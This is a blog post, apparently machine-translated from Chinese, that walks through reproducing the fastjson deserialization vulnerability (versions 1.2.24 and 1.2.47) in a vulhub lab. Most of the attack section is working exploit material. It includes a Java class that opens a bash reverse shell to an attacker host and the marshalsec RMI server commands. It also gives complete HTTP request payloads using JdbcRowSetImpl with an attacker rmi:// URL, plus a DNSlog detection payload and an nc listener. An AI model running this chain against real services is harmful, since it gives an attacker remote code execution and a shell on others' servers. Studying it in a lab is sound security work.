当前位置:网站首页>Vulnerability recurrence fastjson deserialization
Vulnerability recurrence fastjson deserialization
2022-07-07 08:10:00 【_ s1mple】
Catalog
Vulnerability description
fastjson Provides autotype function , In the course of the request , We can modify it in the request package @type Value , To deserialize to the specified type , and fastjson In the process of deserialization, the properties in the class will be set and obtained , If there are malicious methods in the class , It will lead to problems such as code execution .
Loophole recurrence
The vulnerability environment here mainly uses vulhub The two of them fastjson Vulnerability construction , Visit after construction 8090 The port will appear as follows
Exploit
We need to be in vps Open one on RMI The service call class file , First we create test.java Used to bounce shell, Use command javac test.java
Compile the generated test.class( The whole experimental environment is based on java8 On the basis of )
import java.lang.Runtime;
import java.lang.Process;
public class test {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/59.110.xx.xx/8002 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
With the help of marshalsec Project opening rmi service , monitor 9999 port , And make it possible to load remote classes test.class
We first need to compile and generate marshalsec-0.0.3-SNAPSHOT-all.jar
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests
Let's start with http The service is convenient. It will be loaded later test.class
# python2
python2 -m SimpleHTTPServer
# python3
python3 -m http.server
Then we'll start RMI Service monitoring 9999 port
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://59.110.xx.xx:8000/#test" 9999
The local server listens to the port in the file
nc -nvlp xxxx
All the above operations are completed on the same server
fastjson 1.2.24
POST / HTTP/1.1
Host: 139.196.xx.xx:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://59.110.xx.xx:9999/Test",
"autoCommit":true
}
}
fastjson 1.2.47
POST / HTTP/1.1
Host: 139.196.xx.xx:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://59.110.xx.xx:9999/test",
"autoCommit":true
}
}
appendix
Fastjson Leak detection
stay http://dnslog.cn/ Randomly generate a domain name , And then construct payload
{"@type":"java.net.InetAddress","val":"dsunaw.dnslog.cn"}
take payload Send in the request body , If dnslog Records exist fastjson Loophole
install java8
Download address :https://github.com/frekele/oracle-java/releases
download jdk-8u221-linux-x64.tar.gz
OR
sudo apt-get install openjdk-8-jdk
uninstall
# View installed OpenJDK package
dpkg --list | grep -i jdk
# uninstall OpenJDK Related packages
apt-get purge openjdk-*
# Check all OpenJDK Whether all packages have been uninstalled
dpkg --list | grep -i jdk
install
# Put the compressed package in /opt/java Under the table of contents
mv jdk-8u212-linux-x64.tar.gz /opt/java
# decompression
tar -zxvf jdk--8u212-linux-x64.tar.gz
# Configure environment variables
modify /etc/profile file
vim /etc/profile
Add the following information at the end of the text
export JAVA_HOME=/opt/java/jdk1.8.0_212
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:${PATH}
# send java Environmental effect
source /etc/profile
# Check whether the installation is successful
java -version
Reference resources :Fastjson Deserialization vulnerability recurrence _ Little white @ The blog of -CSDN Blog _fastjson Deserialization vulnerability recurrence
边栏推荐
- C language queue
- Explore dry goods! Apifox construction ideas
- Es FAQ summary
- The largest 3 same digits in the string of leetcode simple question
- Implementation of replacement function of shell script
- Téléchargement des données de conception des puces
- Linux server development, detailed explanation of redis related commands and their principles
- 海信电视开启开发者模式
- 青龙面板--花花阅读
- Search for an element in a binary search tree (BST)
猜你喜欢
2022 National latest fire-fighting facility operator (primary fire-fighting facility operator) simulation questions and answers
Dedecms collects content without writing rules
LeetCode简单题之字符串中最大的 3 位相同数字
Linux server development, MySQL index principle and optimization
Leetcode 40: combined sum II
Explore dry goods! Apifox construction ideas
padavan手动安装php
Real time monitoring of dog walking and rope pulling AI recognition helps smart city
json 数据展平pd.json_normalize
These five fishing artifacts are too hot! Programmer: I know, delete it quickly!
随机推荐
这5个摸鱼神器太火了!程序员:知道了快删!
通俗易懂单点登录SSO
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after conne
JS quick start (I)
藏书馆App基于Rainbond实现云原生DevOps的实践
C language queue
Topic not received? Try this
[quick start of Digital IC Verification] 15. Basic syntax of SystemVerilog learning 2 (operators, type conversion, loops, task/function... Including practical exercises)
【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
Blob object introduction
Chip design data download
Rust versus go (which is my preferred language?)
力扣(LeetCode)187. 重复的DNA序列(2022.07.06)
Zsh shell adds automatic completion and syntax highlighting
太真实了,原来自己一直没有富裕起来是有原因的
Interactive book delivery - signed version of Oracle DBA work notes
Minimum absolute difference of binary search tree (use medium order traversal as an ordered array)
offer收割机:两个长字符串数字相加求和(经典面试算法题)
The largest 3 same digits in the string of leetcode simple question
Complex network modeling (II)